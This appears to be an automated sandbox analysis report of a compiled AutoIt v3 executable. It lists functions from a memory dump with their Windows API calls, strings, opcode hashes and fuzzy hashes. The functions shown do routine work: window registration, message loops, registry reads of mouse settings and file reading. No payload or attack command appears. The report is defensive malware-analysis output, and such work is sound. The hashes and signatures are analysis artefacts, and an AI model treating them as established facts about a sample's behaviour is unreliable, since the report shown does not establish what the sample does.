Opcode ID: 38e1929dfa1f956c6c70e2a731ff4ac1459250deb357c3063c2d2279d8b00153
Instruction ID: 992bb6bd30d78c7019c93996c97eccf3d63d8dd7675a8afd56582e20a6f5a86b
Opcode Fuzzy Hash: 38e1929dfa1f956c6c70e2a731ff4ac1459250deb357c3063c2d2279d8b00153
Instruction Fuzzy Hash: 35717E715593019EC300EF65E989E6BBBE8FF59351F40052EF449832B2EF309988CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00AC514C, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 00AC5156
LoadCursorW.USER32(00000000,00007F00), ref: 00AC5165
LoadIconW.USER32(00000063), ref: 00AC517C
LoadIconW.USER32(000000A4), ref: 00AC518E
LoadIconW.USER32(000000A2), ref: 00AC51A0
LoadImageW.USER32 ref: 00AC51C6
RegisterClassExW.USER32 ref: 00AC521C

Part of subcall function 00AB3411: GetSysColorBrush.USER32(0000000F), ref: 00AB3444
Part of subcall function 00AB3411: RegisterClassExW.USER32 ref: 00AB346E
Part of subcall function 00AB3411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AB347F
Part of subcall function 00AB3411: InitCommonControlsEx.COMCTL32(?), ref: 00AB349C
Part of subcall function 00AB3411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AB34AC
Part of subcall function 00AB3411: LoadIconW.USER32(000000A9), ref: 00AB34C2
Part of subcall function 00AB3411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AB34D1

Strings

#, xrefs: 00AC5201
AutoIt v3, xrefs: 00AC520B
0, xrefs: 00AC51FA

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 9010c238d099b9744cb90d5efecc3fb529091cf57ba677b28f218a4108749b17
Instruction ID: 2438b75323bf3060fe972ed6e160e6c37b616c998dce94ad65ce8d234040827a
Opcode Fuzzy Hash: 9010c238d099b9744cb90d5efecc3fb529091cf57ba677b28f218a4108749b17
Instruction Fuzzy Hash: 0E215E71D94304ABDB109FA4ED09B9D7BB4FB09310F000159F618A72E1CFB55A808F85

Uniqueness

Uniqueness Score: -1.00%

Function 00AC4D83, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00AC4E22
KillTimer.USER32(?,00000001), ref: 00AC4E4C
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AC4E6F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AC4E7A
CreatePopupMenu.USER32 ref: 00AC4E8E
PostQuitMessage.USER32(00000000), ref: 00AC4EAF

Strings

TaskbarCreated, xrefs: 00AC4E75

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 2a451fee03a55fa8ce7674a0bac4a6e9761fcf2791d77770ee6af0025a9490f7
Instruction ID: 59c362dd634e6c41870826c9a1326d4eed8321f75c955e99567ea91e83afc553
Opcode Fuzzy Hash: 2a451fee03a55fa8ce7674a0bac4a6e9761fcf2791d77770ee6af0025a9490f7
Instruction Fuzzy Hash: 7D412D322986099BEB116F28DC1DFFA3AA5F749300F03016DF915971E3CE749D90976A

Uniqueness

Uniqueness Score: -1.00%

Function 00AB2E2B, Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,?,00000000,00000000,?,00AEC508,00000004,00000000,00000000,00000000), ref: 00AB2E9F
ShowWindow.USER32(00000000,00000000,00000000,00000000,?,00AEC508,00000004,00000000,00000000,00000000,000000FF), ref: 00AB2EE7
ShowWindow.USER32(00000000,00000006,00000000,00000000,?,00AEC508,00000004,00000000,00000000,00000000), ref: 00AEC55B
ShowWindow.USER32(00000000,?,00000000,00000000,?,00AEC508,00000004,00000000,00000000,00000000), ref: 00AEC5C7

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 61459f93f1bb13ddca9a72da220f24757bdf5a8dd0a66d046f8e9212cc0d4c15
Instruction ID: b8043957af73ec3c202d004484f10781e91be722f222a4bd991182644b3ce016
Opcode Fuzzy Hash: 61459f93f1bb13ddca9a72da220f24757bdf5a8dd0a66d046f8e9212cc0d4c15
Instruction Fuzzy Hash: 3541D5306146C0AAD7359B2B89CCBBA7FAABF86310F24440FE54747662CA75E981D721

Uniqueness

Uniqueness Score: -1.00%

Function 00AC50DB, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 00AC5109
CreateWindowExW.USER32 ref: 00AC512A
ShowWindow.USER32(00000000), ref: 00AC513E
ShowWindow.USER32(00000000), ref: 00AC5147

Strings

AutoIt v3, xrefs: 00AC5101, 00AC5106, 00AC5107
edit, xrefs: 00AC5124

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 33c9706e4dd266eb9ab31c5071ee73014348e76b3b51b319b1a279ff1ba13386
Instruction ID: caf7e0b8d01164f0763a9580c40c83f021aa5f5ece22ac82015fab57f0479c4f
Opcode Fuzzy Hash: 33c9706e4dd266eb9ab31c5071ee73014348e76b3b51b319b1a279ff1ba13386
Instruction Fuzzy Hash: CBF01D715942907AEA2117176C08E272E7DE7C7F10F010029BA1493271CD711880DAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00AD563D, Relevance: 7.7, APIs: 5, Instructions: 163COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AD569B
_memcpy_s.LIBCMT ref: 00AD570D
__read_nolock.LIBCMT ref: 00AD576B
__filbuf.LIBCMT ref: 00AD578E
_memset.LIBCMT ref: 00AD57D2

Part of subcall function 00AD8D58: __getptd_noexit.LIBCMT ref: 00AD8D58

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 85023550e632f3a2e029d8803ad8feb89e05da70391b4bd881aae18f065e9b73
Instruction ID: 69af6d9dec773b78e56c237d7639068c8e9a0c0901523f3e151a9b7c56e26bee
Opcode Fuzzy Hash: 85023550e632f3a2e029d8803ad8feb89e05da70391b4bd881aae18f065e9b73
Instruction Fuzzy Hash: 12518F34E00B05DBDB248FB9898466E77B6AF41360F788B6BE827967D0D770DD509B40

Uniqueness

Uniqueness Score: -1.00%

Function 00AB52B0, Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32 ref: 00AB52E6
PeekMessageW.USER32 ref: 00AB534A
TranslateMessage.USER32(?), ref: 00AB5356
DispatchMessageW.USER32 ref: 00AB5360

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Peek$DispatchTranslate
String ID:
API String ID: 1795658109-0
Opcode ID: 4a0286142f84bd5f3bbc94b4c0d0575c8cc4ccc2ba0b7e75b19e7f9cbc113760
Instruction ID: 2fb063c7be2d69b18e3ef79509ac5da0aae7f21e4b427e6f1a3bad4a0425f5e9
Opcode Fuzzy Hash: 4a0286142f84bd5f3bbc94b4c0d0575c8cc4ccc2ba0b7e75b19e7f9cbc113760
Instruction Fuzzy Hash: 9631D430D487459AEB30DB75DC44FE977FCAB02344F140069E5269B2E2DBB5D885E711

Uniqueness

Uniqueness Score: -1.00%

Function 00AB1284, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00AB1275,SwapMouseButtons,00000004,?), ref: 00AB12A8
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00AB1275,SwapMouseButtons,00000004,?), ref: 00AB12C9
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00AB1275,SwapMouseButtons,00000004,?), ref: 00AB12EB

Strings

Control Panel\Mouse, xrefs: 00AB12A6

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 00be81b65b0a360232bc4061fe5f9173a773d85580ccbc85f1890fae7f2ef6d0
Instruction ID: c8973f6438a414e29e307b9eeec46c0267ec886ae6d3f34f63f5cee3243c8ef4
Opcode Fuzzy Hash: 00be81b65b0a360232bc4061fe5f9173a773d85580ccbc85f1890fae7f2ef6d0
Instruction Fuzzy Hash: 37112775620208BFDB208FA5DC84EEEBBBCEF05741F504569F905DB211E6719E409BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00AC278A, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00AC49C2: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,00AC27AF,?,00000001), ref: 00AC49F4

_free.LIBCMT ref: 00AFFB04
_free.LIBCMT ref: 00AFFB4B

Part of subcall function 00AC29BE: SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 00AC2ADF

Strings

Bad directive syntax error, xrefs: 00AFFB33

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: Bad directive syntax error
API String ID: 2861923089-2118420937
Opcode ID: 81ba8e023d4859641ccf4e7fd6836fcaf785f60dfecb1813b66eb88b902d5f88
Instruction ID: 3e036c5e06c2c8616ed4ebce31ed56e7b996f049044845896e37efe286974036
Opcode Fuzzy Hash: 81ba8e023d4859641ccf4e7fd6836fcaf785f60dfecb1813b66eb88b902d5f88
Instruction Fuzzy Hash: 92917D7191021DAFCF14EFA4CD91AFEB7B4BF09350F14446AF916AB2A1DB709A05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00AC31BF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B0032B
GetOpenFileNameW.COMDLG32(?), ref: 00B00375

Part of subcall function 00AD0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AC2A58,?,00008000), ref: 00AD02A4

Part of subcall function 00AD09C5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AD09E4

Strings

X, xrefs: 00B00343

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 0622d9a10cda2d8064217629c7292eccd71acf0ee9e9df69ef6560feaa3d7d15
Instruction ID: 0f732b20443c4ab22dd7ddf7f2e044c52a4d4924e3b91215b5afe10eb17b08f3
Opcode Fuzzy Hash: 0622d9a10cda2d8064217629c7292eccd71acf0ee9e9df69ef6560feaa3d7d15
Instruction Fuzzy Hash: 4321A571A142989BCF41DFD4C845BEE7BF8AF49310F10405AE509F7241DBB55A88CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00AC20E0, Relevance: 4.9, APIs: 3, Instructions: 422COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57c5aefd9ba4321b4004f064624392db21c0ae01fd00ee44428c9b7ed03271a0
Instruction ID: c809938b36f95be08fda0532791258113537405da3225b202132e029befdd444
Opcode Fuzzy Hash: 57c5aefd9ba4321b4004f064624392db21c0ae01fd00ee44428c9b7ed03271a0
Instruction Fuzzy Hash: 9BF19D75A001199BCF14DF98C980FFEB7B5FF48300F56812EE916AB291DB349A41CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00AC38C0, Relevance: 4.7, APIs: 3, Instructions: 213fileCOMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00AC39C3
ReadFile.KERNELBASE(00000000,?,00010000,00B40980,00000000,00000000,00000000,00000001,00AC3AAF,00008000,00B40980,?,00008000), ref: 00AC39E9

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead_memmove
String ID:
API String ID: 1325644223-0
Opcode ID: 80f0c2de7bab2e6f78f7827d1ff97bba6a536b13ccc2938cbace60d99bd346f9
Instruction ID: 6785b960a3fd00084305f79fe816115fb1b821aceb7febbb32b7879643e13156
Opcode Fuzzy Hash: 80f0c2de7bab2e6f78f7827d1ff97bba6a536b13ccc2938cbace60d99bd346f9
Instruction Fuzzy Hash: 8681EE31A04209EBDF00DF65D980BADBBB4FF05300F15C19AE865AA285EB75DA60DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00AC1680, Relevance: 4.7, APIs: 3, Instructions: 187COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00AC16DB
_memmove.LIBCMT ref: 00AC174C
_memmove.LIBCMT ref: 00AC17B9

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 076800a9267740fb836bf1d53be50781ad4818e469ad375bd06bd1be0851096c
Instruction ID: 565268f51ba7de18d1af58eb350ebc821c6430127bcab29cab4cd3b281e1bab5
Opcode Fuzzy Hash: 076800a9267740fb836bf1d53be50781ad4818e469ad375bd06bd1be0851096c
Instruction Fuzzy Hash: 7661CD71700209EBDF048F29D980BAA7BB4FF45310F1685A9EC5ACF296EB35D960CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00ABAAAA, Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00AD07BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AD07EC
Part of subcall function 00AD07BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 00AD07F4
Part of subcall function 00AD07BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AD07FF
Part of subcall function 00AD07BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AD080A
Part of subcall function 00AD07BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00AD0812
Part of subcall function 00AD07BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 00AD081A

Part of subcall function 00ACFF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00ABAC6B), ref: 00ACFFA7

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00ABAD08
OleInitialize.OLE32(00000000), ref: 00ABAD85
CloseHandle.KERNEL32(00000000), ref: 00AF2F56

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 1be64caefa1edbdef07cf2ebc338636e445982a488078084fecd448512198bbc
Instruction ID: b484b5d716405edbd327a4ce15b3cfcc4235a2d6b023783b5a8f0307efb4f7cd
Opcode Fuzzy Hash: 1be64caefa1edbdef07cf2ebc338636e445982a488078084fecd448512198bbc
Instruction Fuzzy Hash: 3C81C8B19983408EC398EF29AD89A553FE8FB58304B1185BAE41DC7372EF304985DF94

Uniqueness

Uniqueness Score: -1.00%

Function 00AD0FE6, Relevance: 4.5, APIs: 3, Instructions: 44COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00AD0FFE

Part of subcall function 00AD593C: __FF_MSGBANNER.LIBCMT ref: 00AD5953
Part of subcall function 00AD593C: __NMSG_WRITE.LIBCMT ref: 00AD595A
Part of subcall function 00AD593C: RtlAllocateHeap.NTDLL(00C80000,00000000,00000001,?,00000004,?,?,00AD1003,?), ref: 00AD597F

std::exception::exception.LIBCMT ref: 00AD101C
__CxxThrowException@8.LIBCMT ref: 00AD1031

Part of subcall function 00AD87CB: RaiseException.KERNEL32(?,?,?,00B6CAF8,?,?,?,?,?,00AD1036,?,00B6CAF8,?,00000001), ref: 00AD8820

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
String ID:
API String ID: 3074076210-0
Opcode ID: fadbcd228b300ae5b46b1707e3ce12954b9b814f5ed62ca0015d0b602edc1256
Instruction ID: 67ccab7f07a394f2701795fb9b6cdf87ec7ae6c2025de5e0a4edd352736599ff
Opcode Fuzzy Hash: fadbcd228b300ae5b46b1707e3ce12954b9b814f5ed62ca0015d0b602edc1256
Instruction Fuzzy Hash: 71F0A43590421DB6DB20BBACED15ADE7BEC9F01710F200467F91692391DFB18B80D2A1

Uniqueness

Uniqueness Score: -1.00%

Function 00AC48B0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

Part of subcall function 00AD0FE6: _malloc.LIBCMT ref: 00AD0FFE

_memmove.LIBCMT ref: 00AC48FA

Strings

EA06, xrefs: 00B008A1

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: _malloc_memmove
String ID: EA06
API String ID: 1183979061-3962188686
Opcode ID: df1d752d92906578c7bb9f656b1cef228d1f515c5ec916e2ed9a919bbd0920c6
Instruction ID: e8f40c17a22788d11d5222009b9f635d22f4944667ec8fcb3cad13ed6f72364f
Opcode Fuzzy Hash: df1d752d92906578c7bb9f656b1cef228d1f515c5ec916e2ed9a919bbd0920c6
Instruction Fuzzy Hash: 77412B31A042685BDF219B548961FBF7FF5DB4D310F5680A9E882AB286D6318D8483A5

Uniqueness

Uniqueness Score: -1.00%

Function 00AB359E, Relevance: 3.1, APIs: 2, Instructions: 62windowCOMMON

Download Yara Rule

APIs

IsDialogMessageW.USER32(?,00AB533A), ref: 00AB35D8
GetClassLongW.USER32(00AB533A,000000E0), ref: 00AED277

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassDialogLongMessage
String ID:
API String ID: 161858864-0
Opcode ID: b499f7f068b7cdcd6b4efab462197ddb039d84732f732af9deb4a53eedec22b2
Instruction ID: d71eae30f96475eda69f5fee89a4fd827aaf07e59b058c69e3aed7437ce1920d
Opcode Fuzzy Hash: b499f7f068b7cdcd6b4efab462197ddb039d84732f732af9deb4a53eedec22b2
Instruction Fuzzy Hash: 73118F36214215AFDF349F29C980DBA77BCEF457507100669E802CB212DF32DE41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00AC5F8B, Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00AC5FEF

Part of subcall function 00AD359C: __lock.LIBCMT ref: 00AD35A2
Part of subcall function 00AD359C: DecodePointer.KERNEL32(00000001,?,00AC6004,00B08892), ref: 00AD35AE
Part of subcall function 00AD359C: EncodePointer.KERNEL32(?,?,00AC6004,00B08892), ref: 00AD35B9

Part of subcall function 00AC5F00: SystemParametersInfoW.USER32 ref: 00AC5F18
Part of subcall function 00AC5F00: SystemParametersInfoW.USER32 ref: 00AC5F2D

Part of subcall function 00AC5240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AC526C
Part of subcall function 00AC5240: IsDebuggerPresent.KERNEL32 ref: 00AC527E
Part of subcall function 00AC5240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00AC52E6
Part of subcall function 00AC5240: SetCurrentDirectoryW.KERNEL32(?), ref: 00AC5366

SystemParametersInfoW.USER32 ref: 00AC602F

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 19b92625e6dbaa678024199e9c740ae9de6553eefb63af7a8a6513aa302428a7
Instruction ID: 29f78d4618bb8d4f840283223c12fdc8c1eb04a66cfacac8be693d1f7b3449d3
Opcode Fuzzy Hash: 19b92625e6dbaa678024199e9c740ae9de6553eefb63af7a8a6513aa302428a7
Instruction Fuzzy Hash: 7B118E718083019BC710EF68ED0594ABBE8EF89310F00491EF159872B2DFB09A84CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00AC42F9, Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00AC3E72,?,?,?,00000000), ref: 00AC4327
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00AC3E72,?,?,?,00000000), ref: 00B00717

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
